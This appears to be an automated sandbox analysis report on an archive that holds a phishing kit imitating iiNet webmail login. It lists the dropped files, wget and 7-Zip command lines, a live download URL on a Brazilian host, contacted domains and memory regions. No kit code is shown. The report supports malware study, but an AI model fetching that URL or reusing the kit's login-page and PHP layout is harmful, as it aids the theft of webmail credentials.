Files
File Path
|
Type
|
Category
|
Malicious
|
|
---|---|---|---|---|
C:\Users\user\AppData\Local\Temp\nwe5galq.xcu\Webmail-iinet\index.html
|
HTML document, Unicode text, UTF-8 text, with very long lines (3461)
|
dropped
|
||
C:\Users\user\Desktop\extract\Webmail-iinet\index.html
|
HTML document, Unicode text, UTF-8 text, with very long lines (3461)
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\nwe5galq.xcu\Webmail-iinet\css\app-059cd76ea4a5433e14ff6151a432ee48.css
|
ASCII text, with CRLF, LF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\nwe5galq.xcu\Webmail-iinet\css\cb3cc3fa3480964080588c52478ae092-login.png
|
PNG image data, 763 x 207, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\nwe5galq.xcu\Webmail-iinet\email.php
|
PHP script, ASCII text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\nwe5galq.xcu\Webmail-iinet\images\iinet-logo.jpg
|
JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, progressive, precision 8, 405x239,
components 3
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\nwe5galq.xcu\Webmail-iinet\images\tmc-login.png
|
PNG image data, 381 x 103, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\nwe5galq.xcu\Webmail-iinet\next.php
|
PHP script, ASCII text
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\unarchiver.log
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\Desktop\cmdline.out
|
ASCII text, with CRLF line terminators
|
modified
|
||
C:\Users\user\Desktop\download\Webmail-iinet.zip
|
Zip archive data, at least v2.0 to extract, compression method=store
|
dropped
|
||
C:\Users\user\Desktop\extract\Webmail-iinet\css\app-059cd76ea4a5433e14ff6151a432ee48.css
|
ASCII text, with CRLF, LF line terminators
|
dropped
|
||
C:\Users\user\Desktop\extract\Webmail-iinet\css\cb3cc3fa3480964080588c52478ae092-login.png
|
PNG image data, 763 x 207, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\Users\user\Desktop\extract\Webmail-iinet\email.php
|
PHP script, ASCII text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\Desktop\extract\Webmail-iinet\images\iinet-logo.jpg
|
JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, progressive, precision 8, 405x239,
components 3
|
dropped
|
||
C:\Users\user\Desktop\extract\Webmail-iinet\images\tmc-login.png
|
PNG image data, 381 x 103, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\Users\user\Desktop\extract\Webmail-iinet\next.php
|
PHP script, ASCII text
|
dropped
|
||
\Device\ConDrv
|
ASCII text, with CRLF, CR line terminators
|
dropped
|
There are 9 hidden files, click here to show them.
Processes
Path
|
Cmdline
|
Malicious
|
|
---|---|---|---|
C:\Windows\SysWOW64\cmd.exe
|
C:\Windows\system32\cmd.exe /c wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition
--user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "https://maninhocontabilidade.com.br/pop/Webmail-iinet.zip"
> cmdline.out 2>&1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\SysWOW64\wget.exe
|
wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0
(Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "https://maninhocontabilidade.com.br/pop/Webmail-iinet.zip"
|
||
C:\Windows\SysWOW64\7za.exe
|
7za x -y -pinfected -o"C:\Users\user\Desktop\extract" "C:\Users\user\Desktop\download\Webmail-iinet.zip"
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\SysWOW64\unarchiver.exe
|
"C:\Windows\SysWOW64\unarchiver.exe" "C:\Users\user\Desktop\download\Webmail-iinet.zip"
|
||
C:\Windows\SysWOW64\7za.exe
|
"C:\Windows\System32\7za.exe" x -pinfected -y -o"C:\Users\user\AppData\Local\Temp\nwe5galq.xcu" "C:\Users\user\Desktop\download\Webmail-iinet.zip"
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
URLs
Name
|
IP
|
Malicious
|
|
---|---|---|---|
https://maninhocontabilidade.com.br/pop/Webmail-iinet.zip
|
|||
https://www.google.com
|
unknown
|
||
https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js
|
unknown
|
||
https://code.jquery.com/jquery-3.2.1.slim.min.js
|
unknown
|
||
https://stackoverflow.com/a/19758620
|
unknown
|
||
http://www.geoiptool.com/?IP=$ip
|
unknown
|
||
http://ns.attribution.com/ads/1.0/
|
unknown
|
||
https://static.atmail.com/TMC/whitebg.png")
|
unknown
|
||
https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.js
|
unknown
|
||
https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js
|
unknown
|
||
http://codepen.io/mrrocks/pen/EiplA
|
unknown
|
||
https://stackoverflow.com/a/9422689
|
unknown
|
||
https://www.google.com/
|
unknown
|
||
https://maninhocontabilidade.com.br/pop/Webmail-iinet.zip
|
191.37.38.39
|
||
https://maninhocontabilidade.com.br/pop/Webmail-iinet.zipL=6PR
|
unknown
|
There are 4 hidden URLs, click here to show them.
Domains
Name
|
IP
|
Malicious
|
|
---|---|---|---|
bg.microsoft.map.fastly.net
|
199.232.210.172
|
||
maninhocontabilidade.com.br
|
191.37.38.39
|
||
fp2e7a.wpc.phicdn.net
|
192.229.221.95
|
IPs
IP
|
Domain
|
Country
|
Malicious
|
|
---|---|---|---|---|
191.37.38.39
|
maninhocontabilidade.com.br
|
Brazil
|
Memdumps
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
---|---|---|---|---|
9B000
|
stack
|
page read and write
|
||
5F0000
|
heap
|
page read and write
|
||
2B3E000
|
stack
|
page read and write
|
||
2F00000
|
heap
|
page read and write
|
||
123C000
|
stack
|
page read and write
|
||
2AD4000
|
heap
|
page read and write
|
||
1C6000
|
heap
|
page read and write
|
||
548E000
|
stack
|
page read and write
|
||
2A9A000
|
heap
|
page read and write
|
||
9D6000
|
stack
|
page read and write
|
||
2ACE000
|
heap
|
page read and write
|
||
1057000
|
trusted library allocation
|
page execute and read and write
|
||
1D0000
|
heap
|
page read and write
|
||
2DCF000
|
stack
|
page read and write
|
||
100000
|
heap
|
page read and write
|
||
14E000
|
stack
|
page read and write
|
||
CD5000
|
heap
|
page read and write
|
||
1230000
|
heap
|
page read and write
|
||
31B0000
|
trusted library allocation
|
page read and write
|
||
2EBA000
|
trusted library allocation
|
page read and write
|
||
2EF5000
|
trusted library allocation
|
page read and write
|
||
1440000
|
heap
|
page read and write
|
||
D50000
|
trusted library allocation
|
page read and write
|
||
7F0000
|
trusted library allocation
|
page read and write
|
||
D52000
|
trusted library allocation
|
page execute and read and write
|
||
A00000
|
trusted library allocation
|
page read and write
|
||
2710000
|
trusted library allocation
|
page read and write
|
||
150000
|
heap
|
page read and write
|
||
2AC6000
|
heap
|
page read and write
|
||
D7A000
|
heap
|
page read and write
|
||
111E000
|
stack
|
page read and write
|
||
1E0000
|
heap
|
page read and write
|
||
9E8000
|
heap
|
page read and write
|
||
1BE000
|
stack
|
page read and write
|
||
5B0000
|
heap
|
page read and write
|
||
D30000
|
trusted library allocation
|
page read and write
|
||
1370000
|
heap
|
page read and write
|
||
13BE000
|
stack
|
page read and write
|
||
2ACE000
|
heap
|
page read and write
|
||
2ECA000
|
trusted library allocation
|
page read and write
|
||
A48000
|
heap
|
page read and write
|
||
544E000
|
stack
|
page read and write
|
||
D4A000
|
trusted library allocation
|
page execute and read and write
|
||
501E000
|
stack
|
page read and write
|
||
520E000
|
stack
|
page read and write
|
||
2AD2000
|
heap
|
page read and write
|
||
1420000
|
heap
|
page read and write
|
||
C9E000
|
stack
|
page read and write
|
||
8DC000
|
stack
|
page read and write
|
||
C50000
|
heap
|
page read and write
|
||
105B000
|
trusted library allocation
|
page execute and read and write
|
||
7DE000
|
stack
|
page read and write
|
||
2AD7000
|
heap
|
page read and write
|
||
D0F000
|
stack
|
page read and write
|
||
D5C000
|
trusted library allocation
|
page execute and read and write
|
||
2605000
|
heap
|
page read and write
|
||
10A0000
|
heap
|
page read and write
|
||
2ACA000
|
heap
|
page read and write
|
||
7E0000
|
heap
|
page read and write
|
||
1400000
|
trusted library allocation
|
page execute and read and write
|
||
2600000
|
heap
|
page read and write
|
||
75D000
|
stack
|
page read and write
|
||
17D000
|
heap
|
page read and write
|
||
2AD4000
|
heap
|
page read and write
|
||
2A90000
|
heap
|
page read and write
|
||
2EB0000
|
trusted library allocation
|
page read and write
|
||
D42000
|
trusted library allocation
|
page execute and read and write
|
||
9E0000
|
heap
|
page read and write
|
||
2EBC000
|
trusted library allocation
|
page read and write
|
||
1430000
|
trusted library allocation
|
page read and write
|
||
1450000
|
trusted library allocation
|
page read and write
|
||
10C0000
|
heap
|
page read and write
|
||
17DF000
|
stack
|
page read and write
|
||
2AD7000
|
heap
|
page read and write
|
||
103E000
|
stack
|
page read and write
|
||
13F0000
|
trusted library allocation
|
page read and write
|
||
2AC6000
|
heap
|
page read and write
|
||
E0F000
|
stack
|
page read and write
|
||
56C000
|
stack
|
page read and write
|
||
C40000
|
heap
|
page read and write
|
||
79E000
|
stack
|
page read and write
|
||
D7E000
|
heap
|
page read and write
|
||
558E000
|
stack
|
page read and write
|
||
2BCE000
|
stack
|
page read and write
|
||
1C0000
|
heap
|
page read and write
|
||
1050000
|
trusted library allocation
|
page read and write
|
||
D1E000
|
stack
|
page read and write
|
||
5E0000
|
heap
|
page read and write
|
||
9D9000
|
stack
|
page read and write
|
||
2A9D000
|
heap
|
page read and write
|
||
2610000
|
heap
|
page read and write
|
||
2AD7000
|
heap
|
page read and write
|
||
2AD7000
|
heap
|
page read and write
|
||
17B000
|
heap
|
page read and write
|
||
1510000
|
heap
|
page read and write
|
||
1518000
|
heap
|
page read and write
|
||
DAF000
|
stack
|
page read and write
|
||
140E000
|
stack
|
page read and write
|
||
18DF000
|
stack
|
page read and write
|
||
175000
|
heap
|
page read and write
|
||
170000
|
heap
|
page read and write
|
||
104A000
|
trusted library allocation
|
page execute and read and write
|
||
DAE000
|
heap
|
page read and write
|
||
1420000
|
heap
|
page execute and read and write
|
||
51CD000
|
stack
|
page read and write
|
||
530D000
|
stack
|
page read and write
|
||
D70000
|
heap
|
page read and write
|
||
2ACA000
|
heap
|
page read and write
|
||
2AD7000
|
heap
|
page read and write
|
||
133D000
|
stack
|
page read and write
|
||
534E000
|
stack
|
page read and write
|
||
109E000
|
stack
|
page read and write
|
||
D5A000
|
trusted library allocation
|
page execute and read and write
|
||
122E000
|
stack
|
page read and write
|
||
9CC000
|
stack
|
page read and write
|
||
2AD5000
|
heap
|
page read and write
|
||
17E000
|
heap
|
page read and write
|
||
3080000
|
heap
|
page read and write
|
||
2EE7000
|
trusted library allocation
|
page read and write
|
||
13C0000
|
heap
|
page read and write
|
||
274F000
|
stack
|
page read and write
|
||
CD0000
|
heap
|
page read and write
|
||
50CE000
|
stack
|
page read and write
|
||
2EDF000
|
trusted library allocation
|
page read and write
|
||
2EEA000
|
trusted library allocation
|
page read and write
|
||
1042000
|
trusted library allocation
|
page execute and read and write
|
||
A40000
|
heap
|
page read and write
|
||
1120000
|
heap
|
page read and write
|
||
31A0000
|
heap
|
page read and write
|
||
2ED5000
|
trusted library allocation
|
page read and write
|
||
2EF0000
|
trusted library allocation
|
page read and write
|
||
2E81000
|
trusted library allocation
|
page read and write
|
||
3E81000
|
trusted library allocation
|
page read and write
|
||
D96000
|
heap
|
page read and write
|
||
2EE2000
|
trusted library allocation
|
page read and write
|
||
17C000
|
heap
|
page read and write
|
||
31A5000
|
heap
|
page read and write
|
||
7F270000
|
trusted library allocation
|
page execute and read and write
|
There are 128 hidden memdumps, click here to show them.